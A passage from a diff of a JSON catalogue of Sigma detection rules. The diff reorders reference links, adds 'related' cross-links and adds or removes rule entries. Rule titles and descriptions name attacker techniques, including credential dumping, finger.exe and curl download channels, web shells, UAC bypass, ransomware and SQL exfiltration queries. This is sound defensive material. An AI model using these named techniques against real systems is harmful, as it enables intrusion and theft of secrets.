"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "value": "Potential Binary Impersonating Sysinternals Tools" }, @@ -52978,9 +68289,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://twitter.com/bigmacjpg/status/1349727699863011328?s=12", "https://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/", - "http://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_finger_usage.yml" ], "tags": [ @@ -52988,6 +68299,15 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "af491bca-e752-4b44-9c86-df5680533dbc", "value": "Finger.exe Suspicious Invocation" }, @@ -53014,6 +68334,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "729ce0ea-5d8f-4769-9762-e35de441586d", "value": "MpiExec Lolbin" }, @@ -53030,8 +68359,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" ], "tags": [ @@ -53056,8 +68385,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0", - "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt_diagcab.yml" ], "tags": [ @@ -53065,6 +68394,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6545ce61-a1bd-4119-b9be-fcbee42c0cf3", "value": "Execute MSDT.EXE Using Diagcab File" }, @@ -53081,10 +68419,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/jseerden/status/1247985304667066373/photo/1", "https://twitter.com/lefterispan/status/1286259016436514816", - "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Agentexecutor/", + "https://twitter.com/jseerden/status/1247985304667066373/photo/1", + "https://docs.microsoft.com/en-us/mem/intune/apps/intune-management-extension", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_agentexecutor.yml" ], "tags": [ @@ -53092,6 +68430,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7efd2c8d-8b18-45b7-947d-adfe9ed04f61", "value": "AgentExecutor PowerShell Execution" }, @@ -53118,6 +68465,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c4e49831-1496-40cf-8ce1-b53f942b02f9", "value": "Renamed PAExec" }, @@ -53141,6 +68497,15 @@ "attack.t1048" ] }, + "related": [ + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "99793437-3e16-439b-be0f-078782cf953d", "value": "Tap Installer Execution" }, @@ -53166,6 +68531,15 @@ "attack.t1548.002" ] }, + "related": [ + { + "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", "value": "UAC Bypass Using NTFS Reparse Point - Process" }, @@ -53192,6 +68566,15 @@ "attack.t1021.001" ] }, + "related": [ + { + "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", "value": "Suspicious SSH Port Forwarding" }, @@ -53217,6 +68600,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "value": "Application Whitelisting Bypass via PresentationHost.exe" }, @@ -53234,9 +68626,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://twitter.com/cyb3rops/status/1514217991034097664", "https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcss_anomalies.yml" ], "tags": [ @@ -53246,6 +68638,22 @@ "attack.t1569.002" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a7cd7306-df8b-4398-b711-6f3e4935cf16", "value": "Remote Procedure Call Service Anomaly" }, @@ -53271,6 +68679,15 @@ "attack.t1218" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60f16a96-db70-42eb-8f76-16763e333590", "value": "Application Whitelisting Bypass via Dxcap.exe" }, @@ -53297,6 +68714,15 @@ "attack.t1486" ] }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "689308fc-cfba-4f72-9897-796c1dc61487", "value": "Conti Ransomware Execution" }, @@ -53321,6 +68747,15 @@ "attack.t1219" ] }, + "related": [ + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "57bff678-25d1-4d6c-8211-8ca106d12053", "value": "Use of ScreenConnect Remote Access Software" }, @@ -53337,8 +68772,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/mrd0x/status/1511489821247684615", "https://twitter.com/mrd0x/status/1511415432888131586", + "https://twitter.com/mrd0x/status/1511489821247684615", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_dump_susp_dumpminitool.yml" ], "tags": [ @@ -53347,6 +68782,15 @@ "attack.t1003.001" ] }, + "related": [ + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "eb1c4225-1c23-4241-8dd4-051389fde4ce", "value": "Suspicious DumpMinitool Usage" }, @@ -53363,8 +68807,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" ], "tags": [ @@ -53412,8 +68856,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fcdb99c2-ac3c-4bde-b664-4b336329bed2.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" ], "tags": [ @@ -53447,6 +68891,22 @@ "attack.t1105" ] }, + "related": [ + { + "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "21dd6d38-2b18-4453-9404-a0fe4a0cc288", "value": "Curl Start Combination" }, @@ -53471,6 +68931,15 @@ "attack.t1202" ] }, + "related": [ + { + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7dc2dedd-7603-461a-bc13-15803d132355", "value": "Conhost Parent Process Executions" }, @@ -53487,8 +68956,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mobile.twitter.com/0gtweet/status/1564131230941122561", "https://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html", + "https://mobile.twitter.com/0gtweet/status/1564131230941122561", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_deviceenroller_evasion.yml" ], "tags": [ @@ -53538,8 +69007,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti.yml" ], "tags": [ @@ -53547,34 +69016,18 @@ "attack.resource_development" ] }, + "related": [ + { + "dest-uuid": "212306d8-efa4-44c9-8c2d-ed3d2e224aa0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", "value": "Conti Volume Shadow Listing" }, - { - "description": "Detects suspicious powershell invocations from interpreters or unusual programs", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/01/16", - "falsepositive": [ - "Microsoft Operations Manager (MOM)", - "Other scripts" - ], - "filename": "proc_creation_win_susp_powershell_parent_combo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", - "value": "Suspicious PowerShell Invocation Based on Parent Process" - }, { "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", "meta": { @@ -53588,8 +69041,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", + "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" ], "tags": [ @@ -53597,6 +69050,15 @@ "attack.t1053.002" ] }, + "related": [ + { + "dest-uuid": "f3d95a1f-bba2-44ce-9af7-37866cd63fd0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "value": "Interactive AT Job" }, @@ -53645,9 +69107,390 @@ "attack.t1053.005" ] }, + "related": [ + { + "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "value": "Suspicious Add Scheduled Command Pattern" }, + { + "description": "Detects a highly relevant Antivirus alert that reports a password dumper", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_password_dumper.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.virustotal.com/gui/file/5fcda49ee7f202559a6cbbb34edb65c33c9a1e0bde9fa2af06a6f11b55ded619/detection", + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_password_dumper.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003", + "attack.t1558", + "attack.t1003.001", + "attack.t1003.002" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "78cc2dd2-7d20-4d32-93ff-057084c38b93", + "value": "Antivirus Password Dumper Detection" + }, + { + "description": "Detects the suspicious file that is created from PoC code against Windows Print Spooler Remote Code Execution Vulnerability CVE-2021-34527 (PrinterNightmare), CVE-2021-1675 .", + "meta": { + "author": "Sittikorn S, Nuttakorn T, Tim Shelton", + "creation_date": "2021/07/01", + "falsepositive": [ + "Unlikely, or pending PSP analysis" + ], + "filename": "av_printernightmare_cve_2021_34527.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675", + "https://twitter.com/mvelazco/status/1410291741241102338", + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_printernightmare_cve_2021_34527.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "6fe1719e-ecdf-4caf-bffe-4f501cb0a561", + "value": "Antivirus PrinterNightmare CVE-2021-34527 Exploit Detection" + }, + { + "description": "Detects an Antivirus alert in a highly relevant file path or with a relevant file name", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_relevant_files.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_relevant_files.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588" + ] + }, + "related": [ + { + "dest-uuid": "ce0687a0-e692-4b77-964a-0784a8e54ff1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "c9a88268-0047-4824-ba6e-4d81ce0b907c", + "value": "Antivirus Relevant File Paths Alerts" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports an exploitation framework", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_exploiting.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_exploiting.yml" + ], + "tags": [ + "attack.execution", + "attack.t1203", + "attack.command_and_control", + "attack.t1219" + ] + }, + "related": [ + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "238527ad-3c2c-4e4f-a1f6-92fd63adb864", + "value": "Antivirus Exploitation Framework Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a hack tool or other attack tool", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/16", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_hacktool.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/2021/08/16/antivirus-event-analysis-cheat-sheet-v1-8-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_hacktool.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204" + ] + }, + "related": [ + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "fa0c05b6-8ad3-468d-8231-c1cbccb64fba", + "value": "Antivirus Hacktool Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports a web shell. It's highly recommended to tune this rule to the specific strings used by your anti virus solution by downloading a big webshell repo from e.g. github and checking the matches.", + "meta": { + "author": "Florian Roth, Arnim Rupp", + "creation_date": "2018/09/09", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_webshell.yml", + "level": "high", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.virustotal.com/gui/file/7d3cb8a8ff28f82b07f382789247329ad2d7782a72dde9867941f13266310c80/detection", + "https://www.virustotal.com/gui/file/a80042c61a0372eaa0c2c1e831adf0d13ef09feaf71d1d20b216156269045801/detection", + "https://www.virustotal.com/gui/file/e841675a4b82250c75273ebf0861245f80c6a1c3d5803c2d995d9d3b18d5c4b5/detection", + "https://www.virustotal.com/gui/file/bd1d52289203866645e556e2766a21d2275877fbafa056a76fe0cf884b7f8819/detection", + "https://www.nextron-systems.com/2021/03/25/antivirus-event-analysis-cheat-sheet-v1-8/", + "https://www.virustotal.com/gui/file/308487ed28a3d9abc1fec7ebc812d4b5c07ab025037535421f64c60d3887a3e8/detection", + "https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection", + "https://github.com/tennc/webshell", + "https://www.virustotal.com/gui/file/b219f7d3c26f8bad7e175934cd5eda4ddb5e3983503e94ff07d39c0666821b7e/detection", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_webshell.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "fdf135a2-9241-4f96-a114-bb404948f736", + "value": "Antivirus Web Shell Detection" + }, + { + "description": "Detects a highly relevant Antivirus alert that reports ransomware", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/12", + "falsepositive": [ + "Unlikely" + ], + "filename": "av_ransomware.yml", + "level": "critical", + "logsource.category": "antivirus", + "logsource.product": "No established product", + "refs": [ + "https://www.nextron-systems.com/?s=antivirus", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/antivirus/av_ransomware.yml" + ], + "tags": [ + "attack.t1486" + ] + }, + "related": [ + { + "dest-uuid": "b80d107d-fa0d-4b60-9684-b0433e8bdba0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "4c6ca276-d4d0-4a8c-9e4c-d69832f8671f", + "value": "Antivirus Ransomware Detection" + }, + { + "description": "Detects suspicious SQL query keywrods that are often used during recon, exfiltration or destructive activities. Such as dropping tables and selecting wildcard fields", + "meta": { + "author": "@juju4", + "creation_date": "2022/12/27", + "falsepositive": [ + "Inventory and monitoring activity", + "Vulnerability scanners", + "Legitimate applications" + ], + "filename": "db_anomalous_query.yml", + "level": "medium", + "logsource.category": "database", + "logsource.product": "No established product", + "refs": [ + "https://github.com/sqlmapproject/sqlmap", + "https://github.com/SigmaHQ/sigma/tree/master/rules/category/database/db_anomalous_query.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.initial_access", + "attack.privilege_escalation", + "attack.t1190", + "attack.t1505.001" + ] + }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "d84c0ded-edd7-4123-80ed-348bb3ccc4d5", + "value": "Suspicious SQL Query" + }, + { + "description": "Detects an issue in apache logs that reports threading related errors", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/22", + "falsepositive": [ + "3rd party apache modules - https://bz.apache.org/bugzilla/show_bug.cgi?id=46185" + ], + "filename": "web_apache_threading_error.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/product/apache/web_apache_threading_error.yml" + ], + "tags": "No established tags" + }, + "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", + "value": "Apache Threading Error" + }, + { + "description": "Detects a segmentation fault error message caused by a creashing apache worker process", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Unknown" + ], + "filename": "web_apache_segfault.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "http://www.securityfocus.com/infocus/1633", + "https://github.com/SigmaHQ/sigma/tree/master/rules/product/apache/web_apache_segfault.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499.004" + ] + }, + "related": [ + { + "dest-uuid": "2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "1da8ce0b-855d-4004-8860-7d64d42063b1", + "value": "Apache Segmentation Fault" + }, + { + "description": "Detects multiple blocks by the mod_security module (Web Application Firewall)", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/02/28", + "falsepositive": [ + "Vulnerability scanners", + "Frequent attacks if system faces Internet" + ], + "filename": "modsec_mulitple_blocks.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "modsecurity", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/product/modsecurity/modsec_mulitple_blocks.yml" + ], + "tags": [ + "attack.impact", + "attack.t1499" + ] + }, + "uuid": "a06eea10-d932-4aa6-8ba9-186df72c8d23", + "value": "Multiple Modsecurity Blocks" + }, { "description": "Detects when an security threat is detected in Okta.", "meta": { @@ -53662,8 +69505,8 @@ "logsource.product": "okta", "refs": [ "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", "https://okta.github.io/okta-help/en/prod/Content/Topics/Security/threat-insight/configure-threatinsight-system-log.htm", + "https://developer.okta.com/docs/reference/api/event-types/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/okta/okta_security_threat_detected.yml" ], "tags": "No established tags" @@ -53950,8 +69793,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_from_anonymous_ip_addresses.yml" ], "tags": [ @@ -53959,6 +69802,15 @@ "attack.t1573" ] }, + "related": [ + { + "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "d8b0a4fe-07a8-41be-bd39-b14afa025d95", "value": "Activity from Anonymous IP Addresses" }, @@ -53975,8 +69827,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_data_exfiltration_to_unsanctioned_app.yml" ], "tags": [ @@ -53984,6 +69836,15 @@ "attack.t1537" ] }, + "related": [ + { + "dest-uuid": "d4bdbdea-eaec-4071-b4f9-5105e12ea4b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "2b669496-d215-47d8-bd9a-f4a45bf07cda", "value": "Data Exfiltration to Unsanctioned Apps" }, @@ -54000,8 +69861,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_from_susp_ip_addresses.yml" ], "tags": [ @@ -54009,6 +69870,15 @@ "attack.t1573" ] }, + "related": [ + { + "dest-uuid": "b8902400-e6c5-4ba2-95aa-2d35b442b118", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "a3501e8e-af9e-43c6-8cd6-9360bdaae498", "value": "Activity from Suspicious IP Addresses" }, @@ -54025,8 +69895,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_susp_inbox_forwarding.yml" ], "tags": [ @@ -54034,6 +69904,15 @@ "attack.t1020" ] }, + "related": [ + { + "dest-uuid": "774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "6c220477-0b5b-4b25-bb90-66183b4089e8", "value": "Suspicious Inbox Forwarding" }, @@ -54050,8 +69929,8 @@ "logsource.category": "No established category", "logsource.product": "m365", "refs": [ - "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/m365/microsoft365_activity_by_terminated_user.yml" ], "tags": [ @@ -54075,10 +69954,10 @@ "logsource.product": "m365", "refs": [ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", - "https://www.sygnia.co/golden-saml-advisory", - "https://o365blog.com/post/aadbackdoor/", "https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html", + "https://o365blog.com/post/aadbackdoor/", 